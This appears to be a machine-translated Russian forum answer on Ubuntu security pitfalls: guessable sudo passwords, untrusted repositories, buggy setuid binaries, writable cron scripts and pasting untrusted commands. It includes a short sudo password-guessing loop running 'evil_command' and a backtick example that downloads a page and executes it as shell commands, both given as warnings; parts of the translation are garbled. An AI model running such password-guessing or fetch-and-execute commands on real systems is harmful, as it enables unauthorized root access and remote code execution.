Взломать пароль пользователя root невозможно, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать пользователем root с помощью sudo, а ваш пароль легко угадать / перебор, значит, у вас небезопасная система. Пример скрипта, пытающегося проверить пароль:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете подобное приложение sudo apt-get install [app-from-repo]
, репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенной программы.
Процесс обновления запускается с правами root, иначе файлы не могут быть записаны в /usr/bin
или /etc
. Триггер установки также запускается от имени пользователя root и может запускаться произвольно, а возможно, и вредными командами. Теперь не беспокойтесь, для обновления программ необходимы ручные действия, а репозитории Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверенным, поскольку вы не можете проверить источник на наличие вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6
или Flash).
Как упомянул Хавьер Ривера, ошибки в ядре могут привести к выполнению произвольного кода, но программное обеспечение с ошибками, возможно, также опасно, особенно глючные setsuid
корневые двоичные файлы (двоичные файлы, которые будут работать под владельцем файла, root) и другие ошибочные программы, работающие от имени root.
Вы можете создать дыры в безопасности своей системы, если не обращаете внимания на то, что делаете. Например, не полностью понимая концепцию cronjobs, вы добавили cronjob, к /etc/cron.daily
которому запускается программа в вашей домашней папке (например, /bin/sh /home/your-username/myscript.sh
если файл myscript.sh доступен для записи вами, вы можете удалить его, эксплойт может привести к вредоносному ПО). код, в myscript.sh
котором будет выполняться от имени пользователя root (повышение привилегий).
Чтобы оставаться в безопасности, используйте свой разум! Не запускайте команды из ненадежных источников, если вы не знаете, что он делает. Если кто-то говорит «беги `curl 3221233674`
с галочкой», не надо. 3221233674 - это еще один способ записи 192.0.32.10
(IP-адрес example.com). Таким образом, это будет равно:
`curl http://example.com/`
Эти обратные галочки заставляют вывод выполняться как команды оболочки. На простом английском языке: «Загрузите страницу http://example.com/ и попробуйте выполнить загруженную страницу».
Во-первых, в данной команде вы не увидите ничего вредоносного. Но теперь вы знаете, что этим тоже можно злоупотреблять.
Всегда проверяйте команды / сценарии, которые вы получаете из ненадежных источников, таких как Интернет.